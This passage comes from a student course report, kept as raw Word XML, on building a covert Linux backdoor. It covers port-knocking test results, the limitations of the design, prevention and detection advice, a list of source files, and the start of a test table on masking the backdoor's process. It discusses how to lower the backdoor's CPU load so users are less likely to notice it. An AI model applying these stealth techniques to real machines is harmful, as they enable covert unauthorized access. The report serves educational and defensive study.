      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1473200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47"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38"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1473200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In the above screenshot, 3 packets were fired to the following ports: 5432, 1234, and 3425 in that particular order before firing a packet to 10022, which is our listening port for both applications. Once these ports were knocked upon by our script, the firewall allowed our UDP packet to pass through. However, once we change the order to ports 3425, 5432 and 1234 respectively…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1727200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30"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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1727200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The firewall disallows the packet to port </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-port (3425) in the first packet, but allows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (5432) and search-agent (1234) because they are configured in first and second order. Here is a screenshot of the Wireshark capture:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24"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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1714500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The Controller’s firewall is properly configured and is capable for enabling port knocking features.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006E52F9" w:rsidRDefault="006E52F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="h.4mdgtezf3dbj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="65" w:name="_Toc405739282"/>
      <w:bookmarkEnd w:id="64"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="66"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Project Limitations &amp; Future Implementation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During the development phase of our program, using Linux’s System Monitor, we found that our backdoor pinned down one of the four cores in our victim machine. This is due to the fact that the backdoor uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> loop to listen for our controller to send commands. Unfortunately, this is susceptible to detection when an adept user realizes that their machine is losing performance. To remedy this, we would suggest implementing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Epoll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and Signals to alleviate the stress placed on one core. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>One of the few awkward things about our program was how it was not able to handle specified protocols in the Controller’s configuration file. Initially, we found that it would be most intuitive if the protocol is specified by the user within the configuration file. However, upon compilation, our program continues to cause Segmentation Faults and they were due to the way the Controller handled and parsed the protocol we specified. As a workaround, and although it is cumbersome, we hardcoded the option into the program headers. For future implementation, we would like to tackle migrating this configuration issue back to the configuration file instead of specifying it in the header.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We also intended on adding threads to this project. Unfortunately, due to time constraints and awkward problems that we encountered, we decided to focus on the functional components of the project. With that in mind, it would be wise to allow the backdoor to listen on more than one file of interest. This can be accomplished using multithreading or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>epoll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> systems. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finally, our project is currently only capable of monitoring one monitor for one change, per client session. With the inclusion of multithreading in the future, this design feature can become more robust for continual monitoring, and multiple file monitoring. Some other roadblocks occurred during development. One peculiar problem was a file corruption on either the Controller or Backdoor application. This resulted in a delay in the development and testing component of the project, and thus had to omit some design features. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="h.5xh48sxpgt8f" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="68" w:name="_Toc405739283"/>
      <w:bookmarkEnd w:id="67"/>
      <w:r>
        <w:t>Prevention &amp; Detection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Throughout this project, we learned how sophisticated backdoors can be. In fact, the most robust backdoor is quite rare, but once it is embedded within the victim’s machine, there is an infinite amount of possibilities the attacker could do. At that point, the only way to stop the victim machine from being used by the attacker is to prohibit any network access to it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Some measures to detect covert activity is to implement a logging system for the firewall. Because the program may use a port knocking feature, by monitoring the firewall for any suspicious or unauthorized actions of “lowering shields”, then that could very well mean that there is a backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In terms of prevention, frankly speaking, is much more difficult to handle because the means of implementing a backdoor often uses an unsuspecting user. Humans are the weakest link in any security chain, and once an attacker is able to convince such users that they are harmless, that is when users are taken advantage of, and machines become compromised. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The best course of action is, as a network administrator who specializes in network security, to educate the users as much as we can with regards to these dangerous type of attacks. That begs the question of what kind of education do these users require? To start, users should begin to follow corporate policies on stronger passwords. Other suggestions include being aware of social engineering tactics, phishing emails, malicious documents, and “free” storage media. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="h.jcgb4qk6rtu4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="70" w:name="_Toc405739284"/>
      <w:bookmarkEnd w:id="69"/>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To close the discussion, as network administrators, we have done our due diligence to protect the network as much as we can when we educate our frail and sometimes technologically illiterate users. Even so, it is a never ending battle between hackers and administrators. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sun Tzu says that “If you know the enemy and know yourself, you need not fear the result of a hundred battles.” However, “If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.” The purpose of all the assignments and projects thus far in our courses are meant to help us understand the enemy. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>By understanding the enemy, his intentions and his attack strategies, we can tailor our defenses to counter them. We, as beginner network administrators, will have a better grasp of these attacks and while we may not win every battle, we will likely not lose all the battles compared to the rest of our competition. For us, it will take time and experience to fully understand the enemy before we can counter their every move.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="h.p6jbghosqoqi" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="72" w:name="_Toc405739285"/>
      <w:bookmarkEnd w:id="71"/>
      <w:r>
        <w:t>Appendices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="h.na4bp5edsii" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="74" w:name="_Toc405739286"/>
      <w:bookmarkEnd w:id="73"/>
      <w:r>
        <w:t>Appendix I - Files on Disk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>The following are files that are located on-disk:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90017" w:rsidRDefault="00F90017"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="0098471F" w:rsidP="0098471F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Understanding Covert Backdoor Implementation (.pdf)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098471F" w:rsidRDefault="0098471F" w:rsidP="0098471F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Code Listings (directory) which includes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098471F" w:rsidRDefault="0098471F" w:rsidP="0098471F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backdoor.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0098471F" w:rsidRDefault="0098471F" w:rsidP="0098471F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backdoor.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0098471F" w:rsidRDefault="0098471F" w:rsidP="0098471F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>controller.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0098471F" w:rsidRDefault="0098471F" w:rsidP="0098471F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>controller.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0098471F" w:rsidRDefault="0098471F" w:rsidP="0098471F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>helperFunctions.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0098471F" w:rsidRDefault="0098471F" w:rsidP="0098471F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>helperFunctions.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0098471F" w:rsidRDefault="0098471F" w:rsidP="0098471F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>helperFunctions.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098471F" w:rsidRDefault="0098471F" w:rsidP="0098471F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Makefile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0098471F" w:rsidRDefault="0098471F" w:rsidP="0098471F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>README.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098471F" w:rsidRDefault="0098471F" w:rsidP="0098471F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>firewallScript.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098471F" w:rsidRDefault="0098471F" w:rsidP="0098471F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>knockKnock.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="h.72ppnkmxp2da" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="0098471F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="h.iwdzww9s1hnm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="77" w:name="_Toc405739287"/>
      <w:bookmarkEnd w:id="76"/>
      <w:r>
        <w:t>Appendix II</w:t>
      </w:r>
      <w:r w:rsidR="00F90017">
        <w:t xml:space="preserve"> - Test Evidence &amp; Observations (from previous implementation)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="h.cn3m1jpksu4s" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="79" w:name="_Toc405739288"/>
      <w:bookmarkEnd w:id="78"/>
      <w:r>
        <w:t>Test Cases</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="9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0"/>
        <w:gridCol w:w="2780"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="2840"/>
        <w:gridCol w:w="1280"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Case #</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2780" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Expected Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2780" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The Slave’s process is masked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">The process name is explicitly defined in the Slave’s code; cross referencing the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
